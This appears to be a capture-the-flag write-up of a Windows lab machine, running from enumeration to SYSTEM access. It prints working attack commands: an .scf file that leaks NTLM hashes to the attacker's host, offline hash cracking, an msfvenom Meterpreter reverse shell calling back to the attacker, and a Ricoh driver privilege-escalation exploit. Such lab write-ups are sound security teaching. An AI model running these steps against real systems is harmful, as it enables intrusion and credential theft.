Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.238 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.95.238 -oN nmap_tcp -vPORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
The Nmap scan shows four open ports. Port 80 is hosting an IIS web server, port 135 is running Windows RPC, port 445 is used for SMB, and port 5985 is running Microsoft Windows Remote Management (WinRM).
HTTP
When we browse to port 80, we’re met with an HTTP basic authentication prompt. By trying a common set of credentials, we manage to log in with the username and password combination admin:admin.
The site explains that the MFP Firmware Update Centre performs different tests on printer firmware and drivers. Navigating to the Firmware Updates section, we can see what options are available.
It also notes that any uploaded firmware is placed on a file share and then reviewed manually by the internal team.
Because each file is manually reviewed after being uploaded to an SMB share, we may be able to take advantage of this by uploading a file that triggers a connection back to our own machine over SMB, letting us capture an NTLM hash. Since all files are opened during the review process, we can upload a Shell Command File (.scf) containing a simple instruction to request a file from our host.
Start Responder.
sudo responder -w -I tun0Next, we upload a .scf file containing the following:
[shell]
Command=2
IconFile=\\10.10.14.7\tools\nc.ico
[Taskbar]
Command=ToggleDesktopAfter some time, we receive an NTLM hash belonging to the tony user.
<SNIP>
[SMB] NTLMv2-SSP Client : 10.129.95.238
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:45e3e02d68a6856b:7FAA4732C6522B7438BC756179781268:010100000000000080EAFBDF1921DC01F45DC1B874A52046000000000200080050004D004900490001001E00570049004E002D0033004B0047004100500033003600490052004B00440004003400570049004E002D0033004B0047004100500033003600490052004B0044002E0050004D00490049002E004C004F00430041004C000300140050004D00490049002E004C004F00430041004C000500140050004D00490049002E004C004F00430041004C000700080080EAFBDF1921DC0106000400020000000800300030000000000000000000000000200000A4A953F1CA63510B170BEE88260856AF7F892C05B2760E8FE4B1E654C5FC48220A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003700000000000000000000000000
<SNIP>We store the hash and run it through John to crack it, successfully recovering the plaintext password.
└──╼ $john tony_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l<SNIP>y (tony)
1g 0:00:00:00 DONE (2025-09-08 23:44) 33.33g/s 1092Kp/s 1092Kc/s 1092KC/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. Alternatively, hashcat can be used to crack the hash:
└──╼ $hashcat --help | grep -i "ntlm"
<SNIP>
5600 | NetNTLMv2 | Network Protocol
<SNIP>
└──╼ $hashcat -m 5600 tony_hash /usr/share/wordlists/rockyou.txt
<SNIP>
TONY::DRIVER:45e3e02d68a6856b:7faa4732c<SNIP>00000000:l<SNIP>yThe hash is successfully cracked, giving us Tony’s credentials. We then perform a credential spray with crackmapexec to confirm WinRM access on the target.
└──╼ $crackmapexec winrm 10.129.95.238 -u tony -p l<SNIP>y
<SNIP>
WINRM 10.129.95.238 5985 DRIVER [*] Windows 10 Build 10240 (name:DRIVER) (domain:DRIVER)
WINRM 10.129.95.238 5985 DRIVER [+] DRIVER\tony:liltony (Pwn3d!)
We connect to the remote machine via WinRM, where we find the user flag on Tony’s Desktop.
└──╼ $evil-winrm -i 10.129.95.238 -u tony -p l<SNIP>y
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
a4f3<SNIP>b418
Privilege Escalation
Now that we’ve got a shell on the target, we can pivot to a Meterpreter session, which is handy for hunting local privilege-escalation paths.
Generate a malicious executable that will call back to our machine and give us a shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=123 -f exe > shell.exeNext, we configure a listener in msfconsole to catch the incoming connection.
sudo msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.7
set lport 123
runWe then upload shell.exe to the remote host through our WinRM session and run it to establish the connection.
*Evil-WinRM* PS C:\Users\tony> upload shell.exe
Info: Uploading /home/knuckl3s/Driver/shell.exe to C:\Users\tony\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony> .\shell.exeLooking at msfconsole, we can confirm that a Meterpreter session has been established.
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 10.10.14.7:123
[*] Sending stage (203846 bytes) to 10.129.95.238
[*] Meterpreter session 1 opened (10.10.14.7:123 -> 10.129.95.238:49430) at 2025-09-09 00:00:44 -0500
(Meterpreter 1)(C:\Users\tony) > getuid
Server username: DRIVER\tonyChecking the running processes, we notice that we’re on session 0, which indicates the Meterpreter process is operating in a non-interactive, isolated service session.
(Meterpreter 1)(C:\Users\tony) > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
100 4692 shell.exe x64 0 DRIVER\tony C:\Users\tony\shell.exe
<SNIP>
3116 3092 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
<SNIP>We migrate into a process such as explorer, which is running under session ID 1, indicating it’s an interactive session.
(Meterpreter 1)(C:\Users\tony) > migrate 3116
[*] Migrating from 100 to 3116...
[*] Migration completed successfully.With a valid interactive Meterpreter session established, we can now run the Local Exploit Suggester module and review its findings. To do this, we background the current session (bg) and then run the following commands:
bg
use /multi/recon/local_exploit_suggester
set session 1
run(Meterpreter 1)(C:\Windows\system32) > bg
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use /multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
[*] 10.129.95.238 - Collecting local exploits for x64/windows...
[*] 10.129.95.238 - 202 exploit checks are being tried...
[+] 10.129.95.238 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!
[+] 10.129.95.238 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.129.95.238 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows 10 version 1507
[+] 10.129.95.238 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.95.238 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.129.95.238 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48 We’re provided with a list of potential exploits. Since the main website referenced printer software, our focus is on those related to printers. Another clue can be uncovered by checking the PowerShell history file.
*Evil-WinRM* PS C:\Users\tony> cat C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
<SNIP>For Windows PowerShell (v5 and below), PowerShell history is saved in:
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtFor PowerShell Core (pwsh, v6+), it is usually saved in:
C:\Users\tony\AppData\Roaming\Microsoft\PowerShell\PSReadLine\ConsoleHost_history.txtThe PowerShell history shows that a command was run to add a printer, and the driver in use is RICOH PCL6 UniversalDriver V4.23. From our list of potential exploits, we identify one named ricoh_driver_privesc.
We then run the following commands through our Meterpreter session to execute the exploit on the remote machine:
use exploit/windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set session 1
set lhost 10.10.14.7
run[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ricoh_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set lhost 10.10.14.7
lhost => 10.10.14.7
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer zIOyI...
[*] Sending stage (203846 bytes) to 10.129.95.238
[+] Deleted C:\Users\tony\AppData\Local\Temp\ZpFVz.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 2 opened (10.10.14.7:4444 -> 10.129.95.238:49431) at 2025-09-09 00:16:29 -0500
[*] Deleting printer zIOyI
(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEMThe exploit runs successfully, giving us a shell with NT AUTHORITY\SYSTEM privileges. From here, we can retrieve the root flag located on the Administrator’s Desktop.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
3552<SNIP>dfff